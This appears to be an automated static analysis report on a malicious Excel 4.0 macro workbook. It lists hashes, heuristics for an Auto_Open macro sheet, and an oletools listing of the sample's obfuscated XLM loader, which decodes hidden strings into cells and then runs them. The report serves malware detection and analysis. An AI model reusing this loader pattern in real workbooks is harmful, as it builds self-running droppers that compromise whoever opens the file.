Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7926360c5f510f82…

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-25 10:42:52 Authoring application: Microsoft Excel First seen: 2021-02-23
MD5: 9c0dddc4dfa4f27b936b6b09ecf65172 SHA-1: b64c425c5385bf9d5030d45091977efd39240906 SHA-256: 7926360c5f510f8258370695818d93a00ef279b8490e65debf704b508a698084
140 Risk Score

Heuristics 3

  • Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN
    Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
  • Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6619 bytes
SHA-256: 516b9dff9eae343d9d574dcfe54543b512d1d42cd1eb5d21621159f60643b3b6
Preview script
First 1,000 lines of the extracted script
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  KtAjdrtNEE
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C181 
' 0018     27 LABEL : Cell Value, String Constant - BPHqEtmQsyDG len=0 
' 0018     25 LABEL : Cell Value, String Constant - cqiXrBisAp len=0 
' 0018     25 LABEL : Cell Value, String Constant - dTLjeFxjVV len=0 
' 0018     25 LABEL : Cell Value, String Constant - dXAgZDsgJh len=0 
' 0018     20 LABEL : Cell Value, String Constant - eStmg len=0 
' 0018     26 LABEL : Cell Value, String Constant - gHcadghTBrn len=0 
' 0018     21 LABEL : Cell Value, String Constant - gjvxUz len=0 
' 0018     24 LABEL : Cell Value, String Constant - ioFRLEZUk len=0 
' 0018     25 LABEL : Cell Value, String Constant - itMoevihyw len=0 
' 0018     26 LABEL : Cell Value, String Constant - klrttFnfHQS len=0 
' 0018     25 LABEL : Cell Value, String Constant - nZMGusOinP len=0 
' 0018     20 LABEL : Cell Value, String Constant - plrPw len=0 
' 0018     27 LABEL : Cell Value, String Constant - pyhqVYCITHBb len=0 
' 0018     26 LABEL : Cell Value, String Constant - SfWYzPlWQov len=0 
' 0018     20 LABEL : Cell Value, String Constant - SYEmC len=0 
' 0018     24 LABEL : Cell Value, String Constant - TcOQsBYPf len=0 
' 0018     21 LABEL : Cell Value, String Constant - TWoRXo len=0 
' 0018     22 LABEL : Cell Value, String Constant - XLTOBLT len=0 
' 0018     21 LABEL : Cell Value, String Constant - zHARRb len=0 
' 0018     20 LABEL : Cell Value, String Constant - ZlUVY len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  KtAjdrtNEE,C85,"SET.NAME("TcOQsBYPf",VALUE("0"))",""
'  KtAjdrtNEE,C90,"SET.NAME("SfWYzPlWQov",TcOQsBYPf)",""
'  KtAjdrtNEE,C95,"SET.NAME("TWoRXo",TcOQsBYPf)",""
'  KtAjdrtNEE,C100,"SET.NAME("ioFRLEZUk",COUNTA(klrttFnfHQS))",""
'  KtAjdrtNEE,C105,"SET.NAME("nZMGusOinP",COUNTA(BPHqEtmQsyDG))",""
'  KtAjdrtNEE,C109,[],""
'  KtAjdrtNEE,C111,"SET.NAME("ZlUVY","")",""
'  KtAjdrtNEE,C115,"SfWYzPlWQov",""
'  KtAjdrtNEE,C117,"SET.NAME("pyhqVYCITHBb",HLOOKUP("*",klrttFnfHQS,SfWYzPlWQov,FALSE))",""
'  KtAjdrtNEE,C120,"gjvxUz",""
'  KtAjdrtNEE,C125,"SET.NAME("dTLjeFxjVV",TcOQsBYPf)",""
'  KtAjdrtNEE,C130,[],""
'  KtAjdrtNEE,C135,"dTLjeFxjVV",""
'  KtAjdrtNEE,C139,"gHcadghTBrn",""
'  KtAjdrtNEE,C141,"dXAgZDsgJh",""
'  KtAjdrtNEE,C145,"zHARRb",""
'  KtAjdrtNEE,C147,"SET.NAME("SYEmC",VALUE(HLOOKUP("*",BPHqEtmQsyDG,zHARRb,FALSE)))",""
'  KtAjdrtNEE,C152,"cqiXrBisAp",""
'  KtAjdrtNEE,C156,"ZlUVY",""
'  KtAjdrtNEE,C159,"TWoRXo",""
'  KtAjdrtNEE,C163,NEXT(),""
'  KtAjdrtNEE,C165,"itMoevihyw",""
'  KtAjdrtNEE,C167,"SET.NAME("f",INT(T(FORMULA(T(ZlUVY)&"",""&T(itMoevihyw)))))",""
'  KtAjdrtNEE,C171,"eStmg",""
'  KtAjdrtNEE,C175,NEXT(),""
'  KtAjdrtNEE,C177,RETURN(),""
'  KtAjdrtNEE,C204,"SET.NAME("plrPw",C85)",""
'  KtAjdrtNEE,C208,"klrttFnfHQS",""
'  KtAjdrtNEE,C212,"SET.NAME("BPHqEtmQsyDG",R58C15)",""
'  KtAjdrtNEE,C214,"SET.NAME("eStmg",219)",""
'  KtAjdrtNEE,C216,"SET.NAME("XLTOBLT",3)",""
'  KtAjdrtNEE,C218,plrPw(),""
'  KtAjdrtNEE,C219,HALT(),""